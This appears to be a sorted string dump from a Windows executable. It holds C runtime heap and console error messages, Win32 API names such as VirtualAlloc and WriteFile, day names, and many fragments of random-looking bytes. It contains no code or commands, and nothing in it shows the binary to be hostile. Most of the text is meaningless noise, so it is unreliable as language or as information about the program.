Tuesday ;t$,v- t+WWVPV UaeEW) ;Uj>\X_ )u+Ky?[) - unable to initialize heap - unable to open console device - unexpected heap error - unexpected multithread lock error UnhandledExceptionFilter UpdateWindow UQPXY]Y[ URPQQh USER32.dll USER32.DLL u%UC=0 u$WYCz V5IM@M@} vc.orod &?vDy$ ?`^&ve |Ve$`b VirtualAlloc VirtualFree v N+D$ vrartM VUFimr v(vtv w)171C ^W,BYz {W]Dj] Wednesday WideCharToMultiByte WR5!dB WriteFile wsprintfA wtDDDDDDDC Wt j~^ W< tnmf wwwws0 wwwwwwws wwwwwwww? wwwwwwwws wwwwwwwwww wwwwwwwwwwwww wwwwwwwwwwwwww wwwwwwwwwwwwwwz wwwwwwwwwwwwwz wwwwwwwwwwwwwzwwww wwwwwwwwzww wwwwwwwxx wwwwwwwz wwwwwwwzww x0<3;t xeagsB xiE9k;' xSXw<* |~XWMi X '(xaMA y#/3?s yI0met Yilcej Y]L5PP yof6]U >=Yt1j yTdae+de y?"u2j Y]UWK. Z-0yKJ zeeerF ^z&pKV zyisS1